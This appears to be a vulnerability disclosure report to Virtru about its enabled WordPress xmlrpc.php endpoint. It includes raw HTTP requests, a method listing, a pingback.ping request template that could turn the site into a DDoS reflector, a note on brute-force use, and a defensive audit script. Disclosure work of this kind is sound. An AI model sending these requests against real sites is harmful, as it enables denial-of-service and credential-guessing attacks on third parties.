
virtru

Hi Team,

The website https://www.virtru.com/xmlrpc.php has the xmlrpc.php file enabled and could thus potentially be used for a DDoS attack against other victim hosts. WordPress sites that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made part of a huge botnet causing a major DDoS.

URL: https://www.virtru.com/xmlrpc.php

To determine whether the xmlrpc.php file is enabled, send the request below using the Repeater tab in Burp.

Request:

POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Let's see the response.

Response:

HTTP/1.1 200 OK
Date: Wed, 30 Jun 2021 12:23:35 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 4581
Connection: close
Vary: X-Forwarded-Proto,Accept,Accept-Encoding,User-Agent
X-Robots-Tag: noindex, follow
Cache-Control: max-age=0, private, must-revalidate
Expires: Wed, 30 Jun 2021 12:23:35 GMT
X-Powered-By: WP Engine
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 0afe78fefe00000dd07921d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 66775dde69540dd0-BOM
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>translationproxy.updated_job_status</string></value>
<value><string>translationproxy.test_xmlrpc</string></value>
<value><string>translationproxy.get_languages_list</string></value>
<value><string>wpml.get_languages</string></value>
<value><string>wpml.get_post_trid</string></value>
<value><string>demo.addTwoNumbers</string></value>
<value><string>demo.sayHello</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
<value><string>mt.getTrackbackPings</string></value>
<value><string>mt.supportedTextFilters</string></value>
<value><string>mt.supportedMethods</string></value>
<value><string>mt.setPostCategories</string></value>
<value><string>mt.getPostCategories</string></value>
<value><string>mt.getRecentPostTitles</string></value>
<value><string>mt.getCategoryList</string></value>
<value><string>metaWeblog.getUsersBlogs</string></value>
<value><string>metaWeblog.deletePost</string></value>
<value><string>metaWeblog.newMediaObject</string></value>
<value><string>metaWeblog.getCategories</string></value>
<value><string>metaWeblog.getRecentPosts</string></value>
<value><string>metaWeblog.getPost</string></value>
<value><string>metaWeblog.editPost</string></value>
<value><string>metaWeblog.newPost</string></value>
<value><string>blogger.deletePost</string></value>
<value><string>blogger.editPost</string></value>
<value><string>blogger.newPost</string></value>
<value><string>blogger.getRecentPosts</string></value>
<value><string>blogger.getPost</string></value>
<value><string>blogger.getUserInfo</string></value>
<value><string>blogger.getUsersBlogs</string></value>
<value><string>wp.restoreRevision</string></value>
<value><string>wp.getRevisions</string></value>
<value><string>wp.getPostTypes</string></value>
<value><string>wp.getPostType</string></value>
<value><string>wp.getPostFormats</string></value>
<value><string>wp.getMediaLibrary</string></value>
<value><string>wp.getMediaItem</string></value>
<value><string>wp.getCommentStatusList</string></value>
<value><string>wp.newComment</string></value>
<value><string>wp.editComment</string></value>
<value><string>wp.deleteComment</string></value>
<value><string>wp.getComments</string></value>
<value><string>wp.getComment</string></value>
<value><string>wp.setOptions</string></value>
<value><string>wp.getOptions</string></value>
<value><string>wp.getPageTemplates</string></value>
<value><string>wp.getPageStatusList</string></value>
<value><string>wp.getPostStatusList</string></value>
<value><string>wp.getCommentCount</string></value>
<value><string>wp.deleteFile</string></value>
<value><string>wp.uploadFile</string></value>
<value><string>wp.suggestCategories</string></value>
<value><string>wp.deleteCategory</string></value>
<value><string>wp.newCategory</string></value>
<value><string>wp.getTags</string></value>
<value><string>wp.getCategories</string></value>
<value><string>wp.getAuthors</string></value>
<value><string>wp.getPageList</string></value>
<value><string>wp.editPage</string></value>
<value><string>wp.deletePage</string></value>
<value><string>wp.newPage</string></value>
<value><string>wp.getPages</string></value>
<value><string>wp.getPage</string></value>
<value><string>wp.editProfile</string></value>
<value><string>wp.getProfile</string></value>
<value><string>wp.getUsers</string></value>
<value><string>wp.getUser</string></value>
<value><string>wp.getTaxonomies</string></value>
<value><string>wp.getTaxonomy</string></value>
<value><string>wp.getTerms</string></value>
<value><string>wp.getTerm</string></value>
<value><string>wp.deleteTerm</string></value>
<value><string>wp.editTerm</string></value>
<value><string>wp.newTerm</string></value>
<value><string>wp.getPosts</string></value>
<value><string>wp.getPost</string></value>
<value><string>wp.deletePost</string></value>
<value><string>wp.editPost</string></value>
<value><string>wp.newPost</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array>
</value>
</param>
</params>
</methodResponse>

Notice that a successful response is received, showing that the xmlrpc.php file is enabled. Now, considering the domain https://www.virtru.com, the xmlrpc.php file discussed above could potentially be abused to cause a DDoS attack against a victim host. This is achieved by simply sending a request that looks like the one below.
POST /xmlrpc.php HTTP/1.1
Host: www.virtru.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://<YOUR SERVER></string></value>
</param>
<param>
<value><string>https://www.virtru.com/</string></value>
</param>
</params>
</methodCall>

Remediation:
If the xmlrpc.php file is not being used, it should be disabled and removed completely to avoid any potential risk. Otherwise, it should at the very least be blocked from external access.
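The enablement check described above (a system.listMethods call and its methodResponse) can be turned into a repeatable audit for a site you operate, which also confirms that the remediation took effect. This is an added example, not code from the original report; the sample response is a constructed, shortened copy of the method list shown above, and the risky-method set follows the report's references (pingback.ping for DDoS reflection, system.multicall for brute-force amplification).

```python
# Added example (not part of the original report): parse a system.listMethods
# methodResponse and flag the methods this finding is about, so a site owner
# can audit their own xmlrpc.php exposure and verify that blocking it worked.
import xml.etree.ElementTree as ET
import xmlrpc.client
from xml.parsers.expat import ExpatError

# Methods the report's references tie to abuse: pingback.ping (DDoS
# reflection) and system.multicall (brute-force amplification).
RISKY_METHODS = {"pingback.ping", "system.multicall"}

# Constructed sample: a shortened copy of the methodResponse in the report.
SAMPLE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<methodResponse><params><param><value><array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>pingback.ping</string></value>
<value><string>wp.getUsersBlogs</string></value>
</data></array></value></param></params></methodResponse>"""


def parse_method_list(xml_text):
    """Return the method names from a system.listMethods methodResponse.
    Raises ValueError for a fault or for XML that is not a method list."""
    root = ET.fromstring(xml_text)
    if root.tag != "methodResponse" or root.find("fault") is not None:
        raise ValueError("not a successful methodResponse")
    path = "./params/param/value/array/data/value/string"
    return [s.text for s in root.findall(path)]


def assess(methods):
    """Summarise exposure: xmlrpc.php is enabled if any method is listed,
    and the risky subset is what remediation should make disappear."""
    return {
        "enabled": bool(methods),
        "risky": sorted(RISKY_METHODS.intersection(methods)),
    }


def probe(url):
    """Query a site you operate (hypothetical: https://example.test/xmlrpc.php)
    and return the same assessment; a removed or blocked endpoint answers with
    an HTTP error or non-XML, which is reported as not enabled."""
    try:
        methods = xmlrpc.client.ServerProxy(url).system.listMethods()
    except (xmlrpc.client.Error, OSError, ExpatError):
        return {"enabled": False, "risky": []}
    return assess(methods)


if __name__ == "__main__":
    print(assess(parse_method_list(SAMPLE_RESPONSE)))
```

Run probe() against your own site before and after remediation; the risky list should be empty afterwards.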

Reference:

1) Explanation of how an enabled xmlrpc.php file allows brute-force attacks: https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html

2) Explanation of how the xmlrpc.php file enables DoS attacks: https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

Thanks, waiting for your response.

Impact
1) This can be automated from multiple hosts and used to cause a mass DDoS attack on the victim.
2) This method is also used for brute-force attacks to steal the admin credentials and other important credentials.

POC images

virtru.com/xmlrpc.php
